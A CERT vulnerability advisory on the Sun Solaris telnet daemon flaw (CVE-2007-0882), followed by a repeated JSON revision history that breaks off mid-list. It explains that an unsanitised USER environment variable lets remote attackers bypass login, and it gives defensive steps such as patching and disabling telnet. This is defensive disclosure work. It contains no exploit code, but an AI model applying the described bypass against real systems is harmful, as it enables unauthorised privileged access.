Sun Solaris telnet authentication bypass vulnerability
2007-02-12T00:00:00
ID VU:881872 Type cert Reporter CERT Modified 2008-07-21T18:13:00
Description
Overview
A vulnerability in the Sun Solaris telnet daemon (in.telnetd) could allow a remote attacker to log on to the system with elevated privileges.
Description
The Sun Solaris telnet daemon may accept authentication information via the USER environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the root account, but it can be used to gain privileges of other accounts, such as adm and lp.
According to Sun, Solaris 10 (SunOS 5.10) and Solaris "Nevada" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification 102802 and in Alan Hargreaves' blog, here and here.
This vulnerability is being exploited by a worm, for more information see the Security Sun Alert Feed and Technical Alert TA07-059A.
Impact
A remote attacker could log on to a vulnerable system via telnet and gain elevated privileges.
Solution
Apply a patch
Apply the patches referenced in Sun Alert Notification 102802.
Disable telnet
Disable telnet if it's not needed. Telnet can be disabled by issuing the following command:
# svcadm disable telnetRestrict access
You may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks.
Prefer SSH over telnet
SSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet.
Vendor Information
881872
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Vendor has issued information
__ Sort by: Status Alphabetical
Expand all
Affected Unknown __ Unaffected
Javascript is disabled. Click here to view vendors.
__ Sun Microsystems, Inc.
Notified: February 12, 2007 Updated: February 16, 2007
Status
__ Vulnerable
Vendor Statement
No statement is currently available from the vendor regarding this vulnerability.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
This document was written by Art Manion and Chris Taschner.
Other Information
CVE IDs: | CVE-2007-0882
---|--- Severity Metric:** | 67.50 Date Public: | 2007-02-10 Date First Published: | 2007-02-12 Date Last Updated: | 2008-07-21 18:13 UTC Document Revision: | 75
{"id": "VU:881872", "hash": "91c3d11f746092a9e45e9547c65370ef", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc.\n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2019-10-09T19:50:57", "history": [{"bulletin": {"id": "VU:881872", "hash": "2809d462846fdfdd3fc9f15e654cc951a8fa756c5d6c06fa7acb76956bb3582e", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2016-02-03T09:12:30", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2016-02-03T09:12:30", "differentElements": ["cvss"], "edition": 1}, {"bulletin": {"id": "VU:881872", "hash": "f1f3c328d85903de229e3e4bd96b93c8c321af42df2954648f7fe38c37f7e433", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2018-08-30T20:36:48", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-30T20:36:48", "differentElements": ["cvss"], "edition": 2}, {"bulletin": {"id": "VU:881872", "hash": "dc90242f7a42e6dacc07fc51a27285aa", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview\n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description\n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`. \n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution\n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet` **Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems, Inc.| | 12 Feb 2007| 16 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23881872 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\n * <http://www.cert.org/advisories/CA-1994-09.html>\n * <http://www.cert.org/advisories/CA-1995-14.html>\n * <https://www.securecoding.cert.org/confluence/x/-AY>\n * <http://www.kb.cert.org/vuls/id/220816>\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope.\n\nThis document was written by Art Manion and Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>)\n * Date Public: 10 Feb 2007\n * Date First Published: 12 Feb 2007\n * Date Last Updated: 21 Jul 2008\n * Severity Metric: 67.50\n * Document Revision: 75\n\n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://www.us-cert.gov/cas/techalerts/TA07-059A.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://secunia.com/advisories/24166/", "http://www.ietf.org/rfc/rfc1572.txt", "http://www.cert.org/advisories/CA-1995-14.html", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/", "http://www.kb.cert.org/vuls/id/220816", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://www.cert.org/advisories/CA-1994-09.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "https://www.securecoding.cert.org/confluence/x/-AY", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://securitytracker.com/alerts/2007/Feb/1017625.html"], "cvelist": ["CVE-2007-0882", "CVE-2007-0882"], "lastseen": "2018-08-31T02:37:49", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-31T02:37:49", "differentElements": ["cvelist", "description", "modified", "references"], "edition": 3}, {"bulletin": {"id": "VU:881872", "hash": "478e08fd0d6ac0aeebe5954dc77889e8", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc. \n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * 